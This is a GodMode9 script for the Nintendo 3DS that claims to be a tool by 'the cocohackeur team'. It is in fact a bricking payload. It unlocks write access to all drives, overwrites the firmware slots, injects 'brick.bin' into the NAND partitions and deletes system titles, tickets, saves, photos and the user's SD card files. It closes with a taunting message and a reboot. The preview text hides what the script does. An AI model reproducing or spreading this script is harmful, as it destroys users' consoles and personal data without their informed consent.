set PREVIEW_MODE "by the cocohackeur team\n(we are not responsible for any damage\nthat can be cause by this tool)\n\nDON'T power OFF your console."

set ERRORMSG "An error as occured..."

allow -a 0:/
allow -a 1:/
allow -a 2:/
allow -a 3:/

if	chk -u $[ONTYPE] "N3DS"
	goto old
end
sha S:/sector0x96.bin 82F2730D2C2DA3F30165F987FDCCAC5CBAB24B4E5F65C981CD7BE6F438E6D9D3

find -f 1:/title/00040138/20000002/content/????????.app NATIVE_NCCH
imgmount $[NATIVE_NCCH]
verify G:/exefs/.firm
set NATIVE_FIRM $[GM9OUT]/NATIVE_FIRM.firm
cp -w G:/exefs/.firm $[NATIVE_FIRM]
imgumount

cp -n $[NATIVE_FIRM] S:/firm0.bin
cp -n $[NATIVE_FIRM] S:/firm1.bin
goto next

@old

find -f 1:/title/00040138/00000002/content/????????.app NATIVE_NCCH
imgmount $[NATIVE_NCCH]
verify G:/exefs/.firm
set NATIVE_FIRM $[GM9OUT]/NATIVE_FIRM.firm
cp -w G:/exefs/.firm $[NATIVE_FIRM]
imgumount

allow S:/nand.bin
allow 1:/
cp -n $[NATIVE_FIRM] S:/firm0.bin
cp -n $[NATIVE_FIRM] S:/firm1.bin

@next
inject -n V:/brick.bin@1:1 S:/nand.bin@1
inject -n V:/brick.bin@1:2 S:/nand.bin@2
inject -n V:/brick.bin@1:3 S:/nand.bin@3
inject -n V:/brick.bin@1:4 S:/nand.bin@4
inject -n V:/brick.bin@1:5 S:/nand.bin@5

rm -n -s 1:/boot.firm
rm -n -s 1:/data
rm -n -s 1:/dbs
rm -n -s 1:/fixdata
rm -n -s 1:/title
rm -n -s 1:/ticket
rm -n -s 1:/tmp
rm -n -s 1:/private
rm -n -s 1:/ro
rm -n -s 1:/rw
rm -n -s 2:/import
rm -n -s 2:/shared1
rm -n -s 2:/shared2
rm -n -s 2:/sys
rm -n -s 2:/ticket
rm -n -s 2:/title
rm -n -s 2:/tmp
rm -n -s 3:/photo
rm -n -s 0:/3ds
rm -n -s 0:/fbi
rm -n -s 0:/cias
rm -n -s 0:/DCIM
rm -n -s 0:/Download
rm -n -s 0:/Android
rm -n -s 0:/boot.firm
rm -n -s 0:/gm9
rm -n -s 0:/files9
rm -n -s 0:/_nds
rm -n -s 0:/boot.3dsx
rm -n -s 0:/otherapp.bin
rm -n -s 0:/luma
rm -n -s 0:/plugin
rm -n -s 0:/cheats
rm -n -s 0:/boot.firm.bak
rm -n -s 0:/files9
rm -n -s 0:/aeskeydb.bin
rm -n -s 0:/arm9loaderhax.bin
rm -n -s 0:/ntrboot
rm -n -s 0:/boot9strap
rm -n -s 0:/boot.nds
rm -n -s 0:/Nintendo 3DS
rm -n -s 0:/CTGP-7

qr "Now you can do like he (QRcode)\ngood luck to repair your console ;)\nthe last thing this can be displayed is this message." https://www.youtube.com/watch?v=dGQXUYTJyVAs
reboot
